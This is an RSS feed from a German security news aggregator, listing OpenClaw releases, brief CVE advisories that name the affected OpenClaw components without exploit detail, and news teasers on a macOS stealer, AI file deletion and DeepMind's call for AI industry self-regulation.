<pubDate>Fri, 17 Jul 2026 10:16:53 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenClaw release publish tooling <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/openclaw/openclaw/commit/8858944a81c5644d2c4205d9fa574015ae2474b0/hovercard" href="https://github.com/openclaw/openclaw/commit/8858944a81c5644d2c4205d9fa574015ae2474b0"><tt>8858944</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[release-publish/73d04395defe-20260717]]></title>
<description><![CDATA[OpenClaw release publish tooling 73d0439]]></description>
<link>https://tsecurity.de/de/3675397/downloads/release-publish73d04395defe-20260717/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675397/downloads/release-publish73d04395defe-20260717/</guid>
<pubDate>Fri, 17 Jul 2026 09:46:44 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenClaw release publish tooling <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/openclaw/openclaw/commit/73d04395defe25601ef69647e93343f38c2c9a20/hovercard" href="https://github.com/openclaw/openclaw/commit/73d04395defe25601ef69647e93343f38c2c9a20"><tt>73d0439</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-59261 | OpenClaw up to 2026.5.27 Credential Override workspace/.env information disclosure (WID-SEC-2026-2133)]]></title>
<description><![CDATA[A vulnerability classified as problematic was found in OpenClaw up to 2026.5.27. The impacted element is an unknown function of the file workspace/.env of the component Credential Override Handler. Such manipulation leads to information disclosure.

This vulnerability is uniquely identified as CV...]]></description>
<link>https://tsecurity.de/de/3675309/sicherheitsluecken/cve-2026-59261-openclaw-up-to-2026527-credential-override-workspaceenv-information-disclosure-wid-sec-2026-2133/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675309/sicherheitsluecken/cve-2026-59261-openclaw-up-to-2026527-credential-override-workspaceenv-information-disclosure-wid-sec-2026-2133/</guid>
<pubDate>Fri, 17 Jul 2026 09:10:19 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> was found in <a href="https://vuldb.com/product/openclaw">OpenClaw up to 2026.5.27</a>. The impacted element is an unknown function of the file <em>workspace/.env</em> of the component <em>Credential Override Handler</em>. Such manipulation leads to information disclosure.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2026-59261">CVE-2026-59261</a>. The attack can be launched remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-62186 | OpenClaw up to 2026.6.7 HTTP Model Override authorization (WID-SEC-2026-2133)]]></title>
<description><![CDATA[A vulnerability categorized as critical has been discovered in OpenClaw up to 2026.6.7. Affected is an unknown function of the component HTTP Model Override. Executing a manipulation can lead to authorization bypass.

This vulnerability is registered as CVE-2026-62186. It is possible to launch th...]]></description>
<link>https://tsecurity.de/de/3675308/sicherheitsluecken/cve-2026-62186-openclaw-up-to-202667-http-model-override-authorization-wid-sec-2026-2133/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675308/sicherheitsluecken/cve-2026-62186-openclaw-up-to-202667-http-model-override-authorization-wid-sec-2026-2133/</guid>
<pubDate>Fri, 17 Jul 2026 09:10:18 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">critical</a> has been discovered in <a href="https://vuldb.com/product/openclaw">OpenClaw up to 2026.6.7</a>. Affected is an unknown function of the component <em>HTTP Model Override</em>. Executing a manipulation can lead to authorization bypass.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2026-62186">CVE-2026-62186</a>. It is possible to launch the attack remotely. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-62187 | openclaw feishu up to 2026.6.8 improper authorization (WID-SEC-2026-2133)]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in openclaw feishu up to 2026.6.8. This vulnerability affects unknown code. Such manipulation leads to improper authorization.

This vulnerability is traded as CVE-2026-62187. The attack may be launched remotely. There is no exploit availa...]]></description>
<link>https://tsecurity.de/de/3675307/sicherheitsluecken/cve-2026-62187-openclaw-feishu-up-to-202668-improper-authorization-wid-sec-2026-2133/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675307/sicherheitsluecken/cve-2026-62187-openclaw-feishu-up-to-202668-improper-authorization-wid-sec-2026-2133/</guid>
<pubDate>Fri, 17 Jul 2026 09:10:17 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/openclaw:feishu">openclaw feishu up to 2026.6.8</a>. This vulnerability affects unknown code. Such manipulation leads to improper authorization.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-62187">CVE-2026-62187</a>. The attack may be launched remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-62189 | OpenClaw up to 2026.6.8 Mirror Sync Feature symlink (WID-SEC-2026-2133)]]></title>
<description><![CDATA[A vulnerability classified as critical has been found in OpenClaw up to 2026.6.8. This issue affects some unknown processing of the component Mirror Sync Feature. Performing a manipulation results in symlink following.

This vulnerability is known as CVE-2026-62189. Remote exploitation of the att...]]></description>
<link>https://tsecurity.de/de/3675306/sicherheitsluecken/cve-2026-62189-openclaw-up-to-202668-mirror-sync-feature-symlink-wid-sec-2026-2133/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675306/sicherheitsluecken/cve-2026-62189-openclaw-up-to-202668-mirror-sync-feature-symlink-wid-sec-2026-2133/</guid>
<pubDate>Fri, 17 Jul 2026 09:10:15 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/openclaw">OpenClaw up to 2026.6.8</a>. This issue affects some unknown processing of the component <em>Mirror Sync Feature</em>. Performing a manipulation results in symlink following.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2026-62189">CVE-2026-62189</a>. Remote exploitation of the attack is possible. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-62190 | OpenClaw up to 2026.6.8 Wrapper paths authorization (WID-SEC-2026-2133)]]></title>
<description><![CDATA[A vulnerability classified as critical was found in OpenClaw up to 2026.6.8. Impacted is an unknown function of the component Wrapper. Executing a manipulation of the argument paths can lead to authorization bypass.

This vulnerability is handled as CVE-2026-62190. The attack can be executed remo...]]></description>
<link>https://tsecurity.de/de/3675305/sicherheitsluecken/cve-2026-62190-openclaw-up-to-202668-wrapper-paths-authorization-wid-sec-2026-2133/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675305/sicherheitsluecken/cve-2026-62190-openclaw-up-to-202668-wrapper-paths-authorization-wid-sec-2026-2133/</guid>
<pubDate>Fri, 17 Jul 2026 09:10:14 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> was found in <a href="https://vuldb.com/product/openclaw">OpenClaw up to 2026.6.8</a>. Impacted is an unknown function of the component <em>Wrapper</em>. Executing a manipulation of the argument <em>paths</em> can lead to authorization bypass.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2026-62190">CVE-2026-62190</a>. The attack can be executed remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-62191 | OpenClaw up to 2026.6.8 Message Mutation authorization (WID-SEC-2026-2133)]]></title>
<description><![CDATA[A vulnerability identified as critical has been detected in OpenClaw up to 2026.6.8. Affected by this vulnerability is an unknown functionality of the component Message Mutation Handler. The manipulation leads to authorization bypass.

This vulnerability is documented as CVE-2026-62191. The attac...]]></description>
<link>https://tsecurity.de/de/3675304/sicherheitsluecken/cve-2026-62191-openclaw-up-to-202668-message-mutation-authorization-wid-sec-2026-2133/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675304/sicherheitsluecken/cve-2026-62191-openclaw-up-to-202668-message-mutation-authorization-wid-sec-2026-2133/</guid>
<pubDate>Fri, 17 Jul 2026 09:10:13 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">critical</a> has been detected in <a href="https://vuldb.com/product/openclaw">OpenClaw up to 2026.6.8</a>. Affected by this vulnerability is an unknown functionality of the component <em>Message Mutation Handler</em>. The manipulation leads to authorization bypass.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2026-62191">CVE-2026-62191</a>. The attack can be initiated remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-62192 | OpenClaw up to 2026.6.8 Discord Guild Actions authorization (WID-SEC-2026-2133)]]></title>
<description><![CDATA[A vulnerability was found in OpenClaw up to 2026.6.8. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Discord Guild Actions. Executing a manipulation can lead to authorization bypass.

This vulnerability is tracked as CVE-2026-62192. T...]]></description>
<link>https://tsecurity.de/de/3675303/sicherheitsluecken/cve-2026-62192-openclaw-up-to-202668-discord-guild-actions-authorization-wid-sec-2026-2133/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675303/sicherheitsluecken/cve-2026-62192-openclaw-up-to-202668-discord-guild-actions-authorization-wid-sec-2026-2133/</guid>
<pubDate>Fri, 17 Jul 2026 09:10:11 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/openclaw">OpenClaw up to 2026.6.8</a>. It has been declared as <a href="https://vuldb.com/kb/risk">critical</a>. Affected by this vulnerability is an unknown functionality of the component <em>Discord Guild Actions</em>. Executing a manipulation can lead to authorization bypass.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2026-62192">CVE-2026-62192</a>. The attack can be launched remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[release-publish/08987d8f409b-20260717]]></title>
<description><![CDATA[OpenClaw release publish tooling 08987d8]]></description>
<link>https://tsecurity.de/de/3675272/downloads/release-publish08987d8f409b-20260717/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675272/downloads/release-publish08987d8f409b-20260717/</guid>
<pubDate>Fri, 17 Jul 2026 09:02:15 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenClaw release publish tooling <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/openclaw/openclaw/commit/08987d8f409b848098156230b37916be6e4be5dd/hovercard" href="https://github.com/openclaw/openclaw/commit/08987d8f409b848098156230b37916be6e4be5dd"><tt>08987d8</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-62228 | OpenClaw up to 2026.6.4 Node Exec Approvals authorization (EUVD-2026-45116)]]></title>
<description><![CDATA[A vulnerability identified as critical has been detected in OpenClaw up to 2026.6.4. This affects an unknown function of the component Node Exec Approvals. This manipulation causes authorization bypass.

This vulnerability is tracked as CVE-2026-62228. The attack is possible to be carried out rem...]]></description>
<link>https://tsecurity.de/de/3675075/sicherheitsluecken/cve-2026-62228-openclaw-up-to-202664-node-exec-approvals-authorization-euvd-2026-45116/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675075/sicherheitsluecken/cve-2026-62228-openclaw-up-to-202664-node-exec-approvals-authorization-euvd-2026-45116/</guid>
<pubDate>Fri, 17 Jul 2026 07:09:21 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">critical</a> has been detected in <a href="https://vuldb.com/product/openclaw">OpenClaw up to 2026.6.4</a>. This affects an unknown function of the component <em>Node Exec Approvals</em>. This manipulation causes authorization bypass.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2026-62228">CVE-2026-62228</a>. The attack is possible to be carried out remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-62227 | OpenClaw up to 2026.5.25 Routes validate destination server-side request forgery (EUVD-2026-45115)]]></title>
<description><![CDATA[A vulnerability described as problematic has been identified in OpenClaw up to 2026.5.25. Affected by this vulnerability is the function validate of the component Routes. Executing a manipulation of the argument destination can lead to server-side request forgery.

This vulnerability is registere...]]></description>
<link>https://tsecurity.de/de/3675074/sicherheitsluecken/cve-2026-62227-openclaw-up-to-2026525-routes-validate-destination-server-side-request-forgery-euvd-2026-45115/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675074/sicherheitsluecken/cve-2026-62227-openclaw-up-to-2026525-routes-validate-destination-server-side-request-forgery-euvd-2026-45115/</guid>
<pubDate>Fri, 17 Jul 2026 07:09:20 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">problematic</a> has been identified in <a href="https://vuldb.com/product/openclaw">OpenClaw up to 2026.5.25</a>. Affected by this vulnerability is the function <code>validate</code> of the component <em>Routes</em>. Executing a manipulation of the argument <em>destination</em> can lead to server-side request forgery.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2026-62227">CVE-2026-62227</a>. It is possible to launch the attack remotely. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-62229 | OpenClaw up to 2026.5.17 Glob Matching authorization (EUVD-2026-45117)]]></title>
<description><![CDATA[A vulnerability labeled as critical has been found in OpenClaw up to 2026.5.17. This impacts an unknown function of the component Glob Matching. Such manipulation leads to authorization bypass.

This vulnerability is listed as CVE-2026-62229. The attack may be performed from remote. There is no a...]]></description>
<link>https://tsecurity.de/de/3675073/sicherheitsluecken/cve-2026-62229-openclaw-up-to-2026517-glob-matching-authorization-euvd-2026-45117/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675073/sicherheitsluecken/cve-2026-62229-openclaw-up-to-2026517-glob-matching-authorization-euvd-2026-45117/</guid>
<pubDate>Fri, 17 Jul 2026 07:09:19 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/openclaw">OpenClaw up to 2026.5.17</a>. This impacts an unknown function of the component <em>Glob Matching</em>. Such manipulation leads to authorization bypass.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2026-62229">CVE-2026-62229</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[v2026.7.2-beta.2]]></title>
<description><![CDATA[OpenClaw 2026.7.2-beta.2]]></description>
<link>https://tsecurity.de/de/3674883/downloads/v202672-beta2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674883/downloads/v202672-beta2/</guid>
<pubDate>Fri, 17 Jul 2026 03:31:29 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenClaw 2026.7.2-beta.2</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI admits GPT-5.6 occasionally deletes files – but it's an 'honest mistake']]></title>
<description><![CDATA[Data purges deemed an example of 'misaligned behavior' that upstart is working to avoid]]></description>
<link>https://tsecurity.de/de/3674795/it-security-nachrichten/openai-admits-gpt-56-occasionally-deletes-files-but-its-an-honest-mistake/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674795/it-security-nachrichten/openai-admits-gpt-56-occasionally-deletes-files-but-its-an-honest-mistake/</guid>
<pubDate>Fri, 17 Jul 2026 01:08:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Data purges deemed an example of 'misaligned behavior' that upstart is working to avoid]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI admits GPT-5.6 occasionally deletes files – but it’s an ‘honest mistake’]]></title>
<description><![CDATA[Data purges deemed an example of ‘misaligned behavior’ that upstart is working to avoid This article has been indexed from www.theregister.com – Articles Read the original article: OpenAI admits GPT-5.6 occasionally deletes files – but it’s an ‘honest mistake’
Read more →
The post OpenAI admits G...]]></description>
<link>https://tsecurity.de/de/3674792/it-security-nachrichten/openai-admits-gpt-56-occasionally-deletes-files-but-its-an-honest-mistake/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674792/it-security-nachrichten/openai-admits-gpt-56-occasionally-deletes-files-but-its-an-honest-mistake/</guid>
<pubDate>Fri, 17 Jul 2026 01:08:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Data purges deemed an example of ‘misaligned behavior’ that upstart is working to avoid This article has been indexed from www.theregister.com – Articles Read the original article: OpenAI admits GPT-5.6 occasionally deletes files – but it’s an ‘honest mistake’</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/openai-admits-gpt-5-6-occasionally-deletes-files-but-its-an-honest-mistake/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/openai-admits-gpt-5-6-occasionally-deletes-files-but-its-an-honest-mistake/">OpenAI admits GPT-5.6 occasionally deletes files – but it’s an ‘honest mistake’</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[C’mon, just copy this text string and paste it into your macOS Terminal – it’ll fix your computer, honest]]></title>
<description><![CDATA[Newly documented stealer ClickLock comes for the more trusting Mac user with spot of social engineering This article has been indexed from www.theregister.com – Articles Read the original article: C’mon, just copy this text string and paste it into your…
Read more →
The post C’mon, just copy this...]]></description>
<link>https://tsecurity.de/de/3674127/it-security-nachrichten/cmon-just-copy-this-text-string-and-paste-it-into-your-macos-terminal-itll-fix-your-computer-honest/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674127/it-security-nachrichten/cmon-just-copy-this-text-string-and-paste-it-into-your-macos-terminal-itll-fix-your-computer-honest/</guid>
<pubDate>Thu, 16 Jul 2026 18:41:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Newly documented stealer ClickLock comes for the more trusting Mac user with spot of social engineering This article has been indexed from www.theregister.com – Articles Read the original article: C’mon, just copy this text string and paste it into your…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/cmon-just-copy-this-text-string-and-paste-it-into-your-macos-terminal-itll-fix-your-computer-honest/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/cmon-just-copy-this-text-string-and-paste-it-into-your-macos-terminal-itll-fix-your-computer-honest/">C’mon, just copy this text string and paste it into your macOS Terminal – it’ll fix your computer, honest</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[C'mon, just copy this text string and paste it into your macOS Terminal – it'll fix your computer, honest]]></title>
<description><![CDATA[Newly documented stealer ClickLock comes for the more trusting Mac user with spot of social engineering]]></description>
<link>https://tsecurity.de/de/3674002/it-security-nachrichten/cmon-just-copy-this-text-string-and-paste-it-into-your-macos-terminal-itll-fix-your-computer-honest/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674002/it-security-nachrichten/cmon-just-copy-this-text-string-and-paste-it-into-your-macos-terminal-itll-fix-your-computer-honest/</guid>
<pubDate>Thu, 16 Jul 2026 17:39:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Newly documented stealer ClickLock comes for the more trusting Mac user with spot of social engineering]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Appreciation Day: Let’s Be Honest About What We’re Appreciating]]></title>
<description><![CDATA[Today is AI Appreciation Day, and honestly, we mean it. AI has changed how we write code, analyze threats, and get work done faster than anyone thought possible a few years ago. It deserves a moment of gratitude. But at…
Read more →
The post AI Appreciation Day: Let’s Be Honest About What We’re A...]]></description>
<link>https://tsecurity.de/de/3673947/it-security-nachrichten/ai-appreciation-day-lets-be-honest-about-what-were-appreciating/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673947/it-security-nachrichten/ai-appreciation-day-lets-be-honest-about-what-were-appreciating/</guid>
<pubDate>Thu, 16 Jul 2026 17:23:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Today is AI Appreciation Day, and honestly, we mean it. AI has changed how we write code, analyze threats, and get work done faster than anyone thought possible a few years ago. It deserves a moment of gratitude. But at…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/ai-appreciation-day-lets-be-honest-about-what-were-appreciating/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/ai-appreciation-day-lets-be-honest-about-what-were-appreciating/">AI Appreciation Day: Let’s Be Honest About What We’re Appreciating</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Doubly Sub-linear Interactive Proofs of Proximity]]></title>
<description><![CDATA[We study doubly sub-linear interactive proofs of proximity (dsIPPs): proofs that are ultra-fast to generate, and can be used to prove approximate assertions about a huge input. Proof generation is ultra-fast in the sense that it only requires reading a small (sub-linear) portion of the input. App...]]></description>
<link>https://tsecurity.de/de/3673892/ai-nachrichten/doubly-sub-linear-interactive-proofs-of-proximity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673892/ai-nachrichten/doubly-sub-linear-interactive-proofs-of-proximity/</guid>
<pubDate>Thu, 16 Jul 2026 17:03:33 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[We study doubly sub-linear interactive proofs of proximity (dsIPPs): proofs that are ultra-fast to generate, and can be used to prove approximate assertions about a huge input. Proof generation is ultra-fast in the sense that it only requires reading a small (sub-linear) portion of the input. Approximate verification of the proof is even faster (reading an even smaller portion of the input). Similarly to the property testing literature, approximate verification means the sublinear-time honest prover can make the verifier accept each input in the property, but no prover can fool the verifier…]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Appreciation Day: Let’s Be Honest About What We’re Appreciating]]></title>
<description><![CDATA[Today is AI Appreciation Day, and honestly, we mean it. AI has changed how we write code, analyze threats, and get work done faster than anyone thought possible a few years ago. It deserves a moment of gratitude. But at Check Point, we spend most of our year studying the other side of that coin a...]]></description>
<link>https://tsecurity.de/de/3673844/it-security-nachrichten/ai-appreciation-day-lets-be-honest-about-what-were-appreciating/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673844/it-security-nachrichten/ai-appreciation-day-lets-be-honest-about-what-were-appreciating/</guid>
<pubDate>Thu, 16 Jul 2026 16:52:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1600" height="800" src="https://blog.checkpoint.com/wp-content/uploads/2026/05/blog-banner-ai-frontier-model-800x400-1.png" class="webfeedsFeaturedVisual wp-post-image" alt="" link_thumbnail="" decoding="async" fetchpriority="high" srcset="https://blog.checkpoint.com/wp-content/uploads/2026/05/blog-banner-ai-frontier-model-800x400-1.png 1600w, https://blog.checkpoint.com/wp-content/uploads/2026/05/blog-banner-ai-frontier-model-800x400-1-300x150.png 300w, https://blog.checkpoint.com/wp-content/uploads/2026/05/blog-banner-ai-frontier-model-800x400-1-1024x512.png 1024w, https://blog.checkpoint.com/wp-content/uploads/2026/05/blog-banner-ai-frontier-model-800x400-1-768x384.png 768w, https://blog.checkpoint.com/wp-content/uploads/2026/05/blog-banner-ai-frontier-model-800x400-1-1536x768.png 1536w, https://blog.checkpoint.com/wp-content/uploads/2026/05/blog-banner-ai-frontier-model-800x400-1-400x200.png 400w, https://blog.checkpoint.com/wp-content/uploads/2026/05/blog-banner-ai-frontier-model-800x400-1-600x300.png 600w, https://blog.checkpoint.com/wp-content/uploads/2026/05/blog-banner-ai-frontier-model-800x400-1-800x400.png 800w, https://blog.checkpoint.com/wp-content/uploads/2026/05/blog-banner-ai-frontier-model-800x400-1-1200x600.png 1200w, https://blog.checkpoint.com/wp-content/uploads/2026/05/blog-banner-ai-frontier-model-800x400-1-1320x660.png 1320w" sizes="(max-width: 1600px) 100vw, 1600px"><p>Today is AI Appreciation Day, and honestly, we mean it. AI has changed how we write code, analyze threats, and get work done faster than anyone thought possible a few years ago. It deserves a moment of gratitude. But at Check Point, we spend most of our year studying the other side of that coin and our newly released AI Security Report 2026 makes one thing very clear: the same qualities we’re celebrating today are exactly what’s made AI such a powerful tool for attackers too. So in the spirit of appreciating AI honestly, not just enthusiastically, here’s what a […]</p>
<p>The post <a href="https://blog.checkpoint.com/ai-security/ai-appreciation-day-lets-be-honest-about-what-were-appreciating/">AI Appreciation Day: Let’s Be Honest About What We’re Appreciating</a> appeared first on <a href="https://blog.checkpoint.com/">Check Point Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[DeepMind CEO pushes for AI industry self-regulation]]></title>
<description><![CDATA[Google DeepMind CEO Demis Hassabis is pushing for the US AI industry to self-regulate, with the support of government, as a starting point for an international creating shared international standards. In a blog post, he called for a focus on artificial general intelligence (AGI) and national secu...]]></description>
<link>https://tsecurity.de/de/3673460/it-nachrichten/deepmind-ceo-pushes-for-ai-industry-self-regulation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673460/it-nachrichten/deepmind-ceo-pushes-for-ai-industry-self-regulation/</guid>
<pubDate>Thu, 16 Jul 2026 14:33:47 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Google DeepMind CEO Demis Hassabis is pushing for the US AI industry to self-regulate, with the support of government, as a starting point for an international creating shared international standards. In a blog post, he called for a focus on <a href="https://www.computerworld.com/article/4174181/google-talks-singularity-while-scaling-up-agentic-ai-for-enterprises-2.html">artificial general intelligence (AGI)</a> and national security. </p>



<p class="wp-block-paragraph">But it is precisely that focus on national security that may make the results of such an effort, assuming it happens, less than palatable outside of the US.</p>



<p class="wp-block-paragraph">“The rapid progress we’re seeing in AI requires a new approach to testing frontier AI model capabilities that is dynamic, adaptable, and rigorous,” <a href="https://demishassabis.substack.com/p/a-framework-for-frontier-ai-and-the-dawning-of-a-new-age" target="_blank" rel="noreferrer noopener">Hassabis wrote</a>. “The US is well positioned, given its economic and technical standing, to take the first step in developing such a framework. It could establish a new Standards Body modelled on a federally overseen public-private partnership or self-regulatory organization, much like the Financial Industry Regulatory Authority (FINRA), with a board that includes independent leading technical experts and open-source representatives.”</p>



<p class="wp-block-paragraph">He noted, however, that the funding would need to be substantial, and would most likely come from industry, to allow the new body to attract world-class technical talent and obtain the necessary compute resources for large-scale testing.</p>



<p class="wp-block-paragraph">Hassabis proposed that the organization “be responsible for developing assessment protocols and working with appropriate federal agencies and the US National Labs to conduct testing in areas relevant to national security,” and that AI vendor participants be encouraged to adopt best practices such as publishing model cards with technical details, maintaining strong internal cybersecurity, vetting key personnel, and providing sufficient resourcing for safety and security research.</p>



<p class="wp-block-paragraph">This is not the first time Hassabis has <a href="https://www.computerworld.com/article/4178398/deepmind-ceo-agi-could-be-here-in-three-years.html" target="_blank">expressed worries about AGI</a>. </p>



<p class="wp-block-paragraph">DeepMind was involved in an earlier <a href="https://www.cio.com/article/4168122/us-government-agency-to-safety-test-frontier-ai-models-before-release.html" target="_blank">US government initiative evaluating AI safety</a>, alongside Microsoft and xAI (now SpaceXAI) working with the Center for AI Standards and Innovation (CAISI), a division of the US Department of Commerce. It allowed CAISI to conduct pre-deployment evaluations and targeted research to “better assess frontier AI capabilities and advance the state of AI security.”  </p>



<h2 class="wp-block-heading">The rest of the world may have concerns</h2>



<p class="wp-block-paragraph">Analysts and consultants were mixed about the move, with most expressing concerns about whether an industry-focused group would prioritize the public’s best interests.</p>



<p class="wp-block-paragraph">“Self-regulation is not viable because it implies everyone is able to regulate themselves and will do so in line with the best interests of the public. Most tech vendors don’t have the capacity to self-regulate. They would just prefer a set of rules within which they can operate,” said Gartner VP analyst <a href="https://www.gartner.com/en/experts/nader-henein" target="_blank" rel="noreferrer noopener">Nader Henein</a>. “For-profit organizations are required to do what is best for their shareholders, and external regulation ensures that those organizations are never in a conflict of interest where they have to choose between what is good for their shareholders and what is good for the public.”</p>



<p class="wp-block-paragraph">And, said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research, given the international nature of AI models, an effort coordinated by the US government might alienate other countries. </p>



